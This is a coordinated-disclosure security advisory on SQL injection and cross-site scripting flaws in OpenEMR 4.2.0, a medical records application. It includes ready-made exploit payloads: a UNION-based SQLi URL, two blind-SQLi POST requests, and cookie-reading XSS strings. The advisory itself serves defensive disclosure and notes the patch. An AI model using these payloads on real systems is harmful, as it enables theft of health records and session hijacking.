openEMR 4.2.0 Cross Site Scripting / SQL Injection

`Advisory: Multiple reflecting/stored XSS- and SQLi-vulnerabilities in  
openEMR v.4.2.0  
Advisory ID: SROEADV-2015-08  
Author: Steffen Rösemann  
Affected Software: openEMR v.4.2.0 (Release-date: 28th Dec 2014)  
Vendor URL: http://www.open-emr.org  
Vendor Status: patched  
CVE-ID: to be assigned after release of advisory via OSS list  
  
==========================  
Vulnerability Description:  
==========================  
  
Electronic health records and medical practice management application  
OpenEMR 4.2.0 suffers from multiple SQL injection and reflecting XSS  
vulnerabilities.  
  
==================  
Technical Details:  
==================  
  
All below described vulnerabilities can only be exploited by an already  
authenticated user.  
  
=====================  
SQL injection vulnerabilities  
=====================  
  
An SQL injection vulnerability can be found in the facility_admin.php file  
and can be abused by an attacker via the fid-parameter.  
  
Exploit-Example:  
  
http://  
{TARGET}/interface/usergroup/facility_admin.php?fid=3%27+and+1=2+union+select+1,user%28%29,3,4,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+  
  
  
  
Another (blind) SQL injection vulnerability resides in the  
appt_encounter_report.php an can be abused by an attacker by modifying a  
the form_facility-parameter in a POST-request.  
  
Exploit-Example:  
  
POST /openemr-4.2.0/interface/reports/appt_encounter_report.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101  
Firefox/31.0 Iceweasel/31.3.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer:  
http://localhost/openemr-4.2.0/interface/reports/appt_encounter_report.php  
Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 120  
  
form_facility=3%27+AND+substring(version(),1,1)=%275&form_from_date=2015-01-13&form_to_date=2015-01-13&form_refresh=true  
  
  
The last (blind) SQL injection vulnerability resides in the  
appointments_report.php-file and can be as well abused by an attacker via  
crafting own SQL statements in the form_facility-parameter in a POST  
request.  
  
  
Exploit-Example:  
  
POST /openemr-4.2.0/interface/reports/appointments_report.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101  
Firefox/31.0 Iceweasel/31.3.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer:  
http://localhost/openemr-4.2.0/interface/reports/appointments_report.php  
Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 199  
  
form_facility=3%27+and+substring(version(),1,1)=%274&form_provider=&form_from_date=2015-01-13&form_to_date=2015-01-13&form_apptstatus=&form_apptcat=ALL&form_orderby=comment&patient=&form_refresh=true  
  
  
==============  
XSS vulnerabilities  
==============  
  
A reflecting XSS-vulnerability can be found in user_admin.php via the  
id-parameter.  
  
Exploit-Example:  
  
http://  
{TARGET}interface/usergroup/user_admin.php?id=4%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
  
  
  
A stored XSS vulnerability resides in add_edit_event.php via the  
input-field "form_comments" and is executed in appointments_report.php.  
  
  
Exploit-Example:  
  
<script>alert(document.cookie)</script>  
  
  
  
  
=========  
Solution:  
=========  
  
Install the latest patch (released 21st March 2015, see [3]).  
  
  
====================  
Disclosure Timeline:  
====================  
  
12/13-Jan-2015 – found the vulnerability  
13-Jan-2015 - informed the developers  
13-Jan-2015 – release date of this security advisory [without technical  
details]  
13-Jan-2015 - vendor responded and announced a patch  
20-Jan-2015 - vendor provides fix for testing purposes  
20-Jan-2015 - agreement to release technical details when patch has been  
released  
21-Mar-2015 – release date of the patch  
22-Mar-2015 – release date of this security advisory  
22-Mar-2015 – send to FullDisclosure  
  
  
  
========  
Credits:  
========  
  
Vulnerabilities found and advisory written by Steffen Rösemann.  
  
===========  
References:  
===========  
  
[1] http://www.open-emr.org  
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-08.html  
[3] http://www.open-emr.org/wiki/index.php/OpenEMR_Patches  
  
  
`